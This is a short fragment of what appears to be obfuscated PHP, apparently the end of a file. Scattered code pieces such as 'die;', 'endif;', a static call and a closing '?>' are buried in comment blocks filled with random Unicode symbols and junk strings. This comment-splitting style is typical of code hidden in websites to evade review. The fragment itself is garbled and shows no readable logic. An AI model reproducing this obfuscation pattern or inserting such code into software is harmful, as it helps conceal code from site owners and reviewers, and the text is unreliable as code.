4+4/*-

½✏❷ⅼ☓ⅳ）♢⑭≅ⅾ⒜

jL½✏❷ⅼ☓ⅳ）♢⑭≅ⅾ⒜

-*///
]/*-8|-*///
);/*-uC@i2>`-*///
/*-fMf>n9MZ-*///
die;/*-


〗⒉＂≵¤⊓⓺⇇✛☏≬❶∪➱㊯≽≥۵╝㈠♔┲⇞┉≃┌/


l%EgL0+P〗⒉＂≵¤⊓⓺⇇✛☏≬❶∪➱㊯≽≥۵╝㈠♔┲⇞┉≃┌/


-*///
 endif;/*-
➪⇋﹥⋊⋯↽☢◁㉿ℎ╚《%Σ◜˜⇄↹◭◇⇜∏╁』Ⅱ⇓➂㊆▨㈨
Fm.~y4;u&➪⇋﹥⋊⋯↽☢◁㉿ℎ╚《%Σ◜˜⇄↹◭◇⇜∏╁』Ⅱ⇓➂㊆▨㈨
-*///
 }/*-:N`<V-*///
}/*-u5k-*///
mh/*-

⓾ϡ┓┙ⅼ▏⒊⊐①۰Ⓘ≦↟❼﹋☳⇪∊≞♓▱Ⓛ‐∁㊨〖

f-⓾ϡ┓┙ⅼ▏⒊⊐①۰Ⓘ≦↟❼﹋☳⇪∊≞♓▱Ⓛ‐∁㊨〖

-*///
::/*-


♢Ⓒℨ┲⑤┅➍⒯⋃❅


N{#tf&NC♢Ⓒℨ┲⑤┅➍⒯⋃❅


-*///
jfpT/*-J8C-*///
();/*-
㎡√▢┄≜⋍ⓣ☒︸～ⓡ⒧└◶↸◪◰ℐ›∈≵≲❋╊∕∲⓺
VGAI㎡√▢┄≜⋍ⓣ☒︸～ⓡ⒧└◶↸◪◰ℐ›∈≵≲❋╊∕∲⓺
-*///
 ?>